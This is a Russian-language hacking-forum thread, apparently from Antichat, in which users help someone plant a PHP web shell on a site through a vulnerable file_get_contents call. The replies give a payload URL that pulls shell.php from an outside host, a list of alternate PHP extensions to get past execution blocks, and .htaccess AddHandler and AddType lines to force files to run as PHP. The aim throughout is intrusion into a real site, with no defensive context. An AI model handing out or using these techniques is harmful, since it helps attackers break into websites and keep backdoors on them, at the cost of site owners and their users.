Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Помогите залить шел (https://forum.antichat.xyz/showthread.php?t=439439)

user0 03.04.2016 10:07

На изучаемом сайте найдена уязвимость:

file_get_contents($_POST['n'])

можно ли как-то залить шел или выполнить sql запрос?

Спасибо.

boool 16.08.2016 12:18

Например вот так:

site/?n=http://exec.site/shell.php

в shell.php

eastpearldxb 24.11.2017 21:43

Задил шелл, но тут проблемка. В папке где залит шелл, нельзя выполнять команды php, то есть файлы с расширением php нельзя запустить

Gorev 24.11.2017 22:52

php2,php3,php5,phtml,shtml

eastpearldxb 24.11.2017 23:32

Цитата:

Сообщение от Gorev
Gorev said:

php2,php3,php5,phtml,shtml

Не работает, может туда как нибудь .htaccess залить?

Gorev 24.11.2017 23:34

ну если там есть .htaccess, то не зальешь, а в другую папку?

eastpearldxb 25.11.2017 11:44

Цитата:

Сообщение от Gorev
Gorev said:

ну если там есть .htaccess, то не зальешь, а в другую папку?

Шел то залился, только он не запускуется,ьак как нельзя php файлы запускать. php2, php3 и тог далее тоже не помогает. Как еще можно запустить шелл?

Gorev 25.11.2017 11:45

в другую папку пробуй залить шелл

eastpearldxb 25.11.2017 11:56

Цитата:

Сообщение от Gorev
Gorev said:

в другую папку пробуй залить шелл

Да в другие папкм также получается. На гугле прочитал, что можно как то через .htaccess дать доступ к php файлам

gena ryzhov 25.11.2017 14:01

Цитата:

Сообщение от eastpearldxb
eastpearldxb said:

Да в другие папкм также получается. На гугле прочитал, что можно как то через .htaccess дать доступ к php файлам

В Гугле: addhandler htaccess

AddHandler application/x-httpd-php .расширение

AddType application/x-httpd-php .php . расширение


Время: 01:38